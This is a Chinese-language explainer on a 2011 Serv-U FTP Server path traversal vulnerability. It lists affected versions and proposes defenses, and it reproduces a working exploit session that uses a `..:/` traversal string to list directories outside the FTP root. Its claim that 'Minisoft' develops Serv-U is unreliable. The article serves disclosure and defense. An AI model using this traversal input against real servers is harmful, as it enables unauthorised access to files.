serv-u越权遍历方法,代码.18. Affected:
19. 220 Serv-U FTP Server v7.3 ready...
20. 220 Serv-U FTP Server v7.1 ready...
21. 220 Serv-U FTP Server v6.4 ready...
22. 220 Serv-U FTP Server v8.2 ready...
23. 220 Serv-U FTP Server v10.5 ready...
24.
### Serv-U 越权遍历知识点解析
#### 一、Serv-U FTP Server 简介
Serv-U FTP Server 是一款流行的文件传输协议(FTP)服务器软件,由美国公司 Minisoft 开发并维护。该软件支持多种操作系统,如 Windows 和 Linux,并提供了丰富的功能和良好的用户界面。Serv-U 的主要用途是实现文件在不同计算机之间的高效传输。
#### 二、越权遍历漏洞概述
越权遍历(Path Traversal)是一种常见的安全漏洞,攻击者可以通过该漏洞访问到服务器上的非授权文件或目录。在本案例中,Serv-U FTP Server 存在一个路径遍历漏洞,允许未经适当验证的用户访问超出其权限范围的文件系统区域。这通常发生在软件未正确处理用户输入的情况下,例如在接收来自用户的文件路径时未能进行有效的过滤或检查。
#### 三、受影响版本
根据文档中的描述,以下版本的 Serv-U FTP Server 受此漏洞影响:
- Serv-U FTP Server v6.4
- Serv-U FTP Server v7.1
- Serv-U FTP Server v7.3
- Serv-U FTP Server v8.2
- Serv-U FTP Server v10.5
这些版本均存在越权遍历的安全问题,可能允许攻击者获取敏感数据或进一步利用服务器。
#### 四、漏洞发现与披露
漏洞被 Kingcope 发现,并于 2011 年首次公开。这表明,早在十多年前,就已经有人注意到这个问题。对于这类漏洞而言,及时修复和升级到最新版本是非常重要的,以避免潜在的风险。
#### 五、漏洞利用示例
在文档的部分内容中提供了一个利用示例:
```plaintext
C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready
Benutzer (192.168.133.134:(none)): ftp
(anonymous user:>)
331 Username okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd "/..:/..:/..:/..:/programfiles"
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/programfiles
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r-- 1 user group 0 Nov 12 21:48 .
dr--r--r-- 1 user group 0 Nov 12 21:48 ..
drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundation
drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications
drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files
drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTP Server
drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources
d--------- 1 user group 0 Jul 8 16:12 InstallShield Installation Information
drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer
drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch
drw-rw-rw- 1 user group 0 Feb 12 2011 Java
drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting
drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express
drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL
drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw- 1 user group 0 Feb 12 2011 Sun
d--------- 1 user group 0 Jul 29 15:13 Uninstall Information
drw-rw-rw- 1 user group 0 Feb 5 2011 VMware
drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR
drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player
drw-rw-rw- 1 user group 0
```
在这个例子中,攻击者通过发送一系列 `..:/` 字符串的方式成功地将当前工作目录改变到了 `programfiles` 文件夹,并能够查看其中的文件列表。这种利用方式揭示了 Serv-U 在处理路径时存在的缺陷,即未能正确过滤或限制用户输入的路径。
#### 六、防御措施
针对此类漏洞,可以采取以下几种防御措施:
1. **更新至最新版本**:确保使用的 Serv-U FTP Server 版本是最新的,这样可以获取到官方发布的所有安全更新。
2. **限制路径访问**:通过配置文件或其他管理工具来限制用户可以访问的路径,确保只有经过验证的用户才能访问特定的目录。
3. **输入验证**:在处理用户提供的路径时进行严格的验证,比如禁用任何包含特殊字符(如 `..`)的路径。
4. **审计日志**:启用详细的日志记录,以便在发生异常情况时能够迅速追踪并解决问题。
5. **权限最小化**:遵循权限最小化原则,为用户提供仅必要的访问权限,避免授予不必要的文件系统访问权限。
通过以上措施,可以在很大程度上减轻或避免因越权遍历漏洞而带来的安全风险。